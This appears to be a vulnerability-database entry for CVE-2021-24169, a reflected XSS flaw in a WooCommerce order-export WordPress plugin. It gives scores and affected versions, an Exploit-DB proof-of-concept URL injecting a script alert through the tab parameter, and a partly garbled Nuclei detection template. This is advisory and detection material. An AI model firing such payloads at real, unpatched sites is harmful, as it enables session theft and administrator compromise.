CVE-2021-24169
Published: 2021-04-05
Priority: P3 · 43 · medium · CVSS 3.1: 6.1
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EXPLOIT
EPSS: 10.35% (95.1th percentile)
This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| algolplus | advanced_order_export_for_woocommerce | < 3.1.8 | 3.1.8 |
CVSS provenance
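| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |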
No detection rules found.
Exploit-DB
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
exploitdb·2021-09-23·CVSS 6.1
---
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169
1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=alert(1)
Nuclei
WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
nuclei·CVSS 6.1
WordPress Advanced Order Export For WooCommerce alert(document.domain) HTTP/1.1
Host: {{Hostname}}
matchers:
  - type: dsl
    dsl:
      - 'status_code_2 == 200'
      - 'contains(body_2, "alert(document.domain)")'
      - 'contains(body_2, "woo-order-export-lite")'
    condition: and
# digest: 4a0a0047304502203260bf5b1b6daba5594b73fb832bd892ddf1c469fead8bc623560b74270eb4c102210092700ebf4e4dbee38b8405e6d13b4c8f322466364bc9a45f4477cb289019d5e7:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164263/WordPress-Advanced-Order-Export-For-WooCommerce-3.1.7-Cross-Site-Scripting.html
https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
2021-04-05
Published